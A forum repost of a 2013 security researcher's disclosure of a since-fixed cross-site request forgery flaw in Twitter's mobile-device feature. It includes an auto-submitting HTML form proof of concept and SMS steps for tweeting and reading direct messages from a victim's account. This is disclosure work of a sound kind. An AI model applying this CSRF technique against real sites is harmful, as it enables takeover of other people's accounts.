It is currently Thu Mar 28, 2024 9:57 am View unanswered posts | View active topics |


Board index » Community » Computers & Technology


Post new topic Reply to topic  [ 1 post ] 
Author Message
 Post subject: The bug that let you Tweet from Any Twitter Account
PostPosted: Wed Nov 06, 2013 10:00 am 
Decent Challenge
Decent Challenge
User avatar

Joined: Mon Jun 07, 2004 10:02 pm
Posts: 416
https://henryhoggard.co.uk/?p=24




In this post I will explain how I could read direct messages and Tweet from anyones Twitter account using a Cross Site Request Forgery vulnerability.

Timeline
Discovered: Sunday 3rd November
Reported: Sunday 3rd November
Fixed: Sunday 3rd November

What is Cross Site Request Forgery?
“CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker’s choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application.” Source: https://www.owasp.org/index.php/Cross-S ... %28CSRF%29

The Exploit
The vulnerability allows me to Tweet from anyone’s Twitter account and read their direct messages. It exists in the add a mobile device feature of Twitter, where you can add a mobile device to control your account via SMS. (https://twitter.com/settings/devices) To exploit this we create a CSRF page that will add the attackers mobile number and network to the victims account. Although the page does provide an authenticity token aimed at preventing CSRF, it does not seem to validate that the token is correct, and therefore, we can enter any value.

The exploit code below shows the PoC that I used to send the request, of course attackers could disguise this as a real webpage and send the request in the background.


<form action="https://twitter.com/settings/devices/create" method="POST"><input type="hidden" name="device_type" value="phone" />
<input type="hidden" name="authenticity_token" value="randomthinghere" />
<input type="hidden" name="device[country_code]" value="+44" />
<input type="hidden" name="device_country_intl_prefix" value="+44" />
<input type="hidden" name="device[region_country_code]" value="" />
<input type="hidden" name="device[address]" value="7123456789" />
<input type="hidden" name="carrier_name" value="Vodafone" />
<input type="hidden" name="device[carrier]" value="vodafone_uk" />
<input type="submit" value="Submit request" /></form><script type="text/javascript">
document.forms[0].submit();></script>


I will demo this vulnerability on my device on the Vodafone network, the network and country are important, as the mobile sms code changes for each network. Using some social engineering the attacker can force the target to visit the webpage with the exploit code on it, once we are sure the target has visited the page, Twitter will be waiting for the device to be activiated: Text “GO” to the mobile short code, in my case it was 86444. Then you will receive a confirmation SMS saying you have activated the device with the account. From here you can simply text the number to send a Tweet on the users account.

“GO” -> 86444

“Your phone is activated! Reply w/ help to checkout all the things you can do with Twitter Text messaging…”

This now indicates we have successfully compromised the account, we can now send Tweets from the targets account.

Next I can send any message to 86444:
“Here is my PoC message”



Severity
Using this I could use all of the Twitter SMS features, including sending Tweets, sending messages and reading direct messages

Protect Yourself
To protect yourself against these types of attacks in the future, I recommend Noscript.

_________________
Image


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 1 post ] 

Board index » Community » Computers & Technology


Who is online

Users browsing this forum: No registered users and 7 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group